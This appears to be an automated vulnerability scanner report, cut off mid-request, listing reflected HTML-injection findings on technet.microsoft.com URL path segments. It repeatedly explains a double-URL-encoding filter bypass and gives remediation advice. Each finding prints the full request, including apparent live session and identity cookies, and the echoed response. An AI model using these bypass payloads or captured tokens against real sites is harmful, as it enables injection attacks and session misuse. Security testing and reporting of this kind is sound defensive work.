HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:22:46 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb742437.aspxb0703"><a>705b67e6431" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1b59%2522%253e%253ca%253e118c6a3eaa5 was submitted in the REST URL parameter 1. This input was echoed as c1b59"><a>118c6a3eaa5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usc1b59%2522%253e%253ca%253e118c6a3eaa5/library/bb742438.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:20:49 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usc1b59"><a>118c6a3eaa5/library/bb742438" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcafe%2522%253e%253ca%253eab5a2bf9ae was submitted in the REST URL parameter 2. This input was echoed as fcafe"><a>ab5a2bf9ae in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryfcafe%2522%253e%253ca%253eab5a2bf9ae/bb742438.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10198 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:21:45 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryfcafe"><a>ab5a2bf9ae/bb742438" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8911%2522%253e%253ca%253e53e00b5b92a was submitted in the REST URL parameter 3. This input was echoed as e8911"><a>53e00b5b92a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb742438.aspxe8911%2522%253e%253ca%253e53e00b5b92a HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:22:29 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb742438.aspxe8911"><a>53e00b5b92a" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6b33%2522%253e%253ca%253e454334ed0dc was submitted in the REST URL parameter 1. This input was echoed as d6b33"><a>454334ed0dc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usd6b33%2522%253e%253ca%253e454334ed0dc/library/bb742457.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:19:01 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd6b33"><a>454334ed0dc/library/bb742457" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cccec%2522%253e%253ca%253e0ccff13a724 was submitted in the REST URL parameter 2. This input was echoed as cccec"><a>0ccff13a724 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarycccec%2522%253e%253ca%253e0ccff13a724/bb742457.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:19:42 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarycccec"><a>0ccff13a724/bb742457" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bce8%2522%253e%253ca%253e7b6302c4f0 was submitted in the REST URL parameter 3. This input was echoed as 7bce8"><a>7b6302c4f0 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb742457.aspx7bce8%2522%253e%253ca%253e7b6302c4f0 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 